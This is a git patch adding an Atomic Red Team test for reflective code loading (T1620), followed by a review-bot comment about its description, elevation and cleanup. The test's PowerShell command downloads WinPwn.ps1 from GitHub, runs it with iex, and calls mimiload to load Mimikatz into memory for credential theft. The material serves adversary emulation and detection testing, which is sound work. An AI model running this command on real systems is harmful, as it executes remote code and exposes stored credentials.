From e7d9f8515954e6ff4e726ba2facd80c9c8c4fe50 Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 17:44:05 -0500
Subject: [PATCH] T1620 - Reflective Code Loading (#1959)

* Create T1620.yaml

* Update T1620.yaml

Co-authored-by: Carrie Roberts
---
 atomics/T1620/T1620.yaml | 13 +++++++++++++
 1 file changed, 13 insertions(+)
 create mode 100644 atomics/T1620/T1620.yaml

diff --git a/atomics/T1620/T1620.yaml b/atomics/T1620/T1620.yaml
new file mode 100644
index 00000000..40c7d3f6
--- /dev/null
+++ b/atomics/T1620/T1620.yaml
@@ -0,0 +1,13 @@
+attack_technique: T1620
+display_name: "Reflective Code Loading"
+atomic_tests:
+- name: WinPwn - Reflectively load Mimik@tz into memory
+ description: Reflectively load Mimik@tz into memory technique via function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ mimiload -consoleoutput -noninteractive
+ name: powershell
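Review bot: The executor's `command` fetches WinPwn.ps1 over the network and feeds it directly to `iex` with no integrity check, so the only thing constraining what actually runs on the test host is the commit SHA embedded in the URL; an operator reading the atomic cannot tell that from the `description`, which should state it, e.g. `description: Reflectively loads Mimik@tz into memory via WinPwn's mimiload function. The WinPwn.ps1 script is downloaded from GitHub at runtime (pinned to a specific commit) and executed with Invoke-Expression; expect AV/EDR to flag it.` The test also declares no `elevation_required`, yet loading Mimik@tz to read credentials presumably needs an elevated session — if that holds for `mimiload`, add `elevation_required: true` after `supported_platforms`. Nothing in the hunk removes the in-memory module or any artefacts WinPwn writes, so a `cleanup_command` (or a note that none is needed) would help whoever runs this repeatedly. The hunk as displayed here has lost its leading whitespace, so the nesting of `description`/`executor`/`name` under the list item cannot be confirmed from this view.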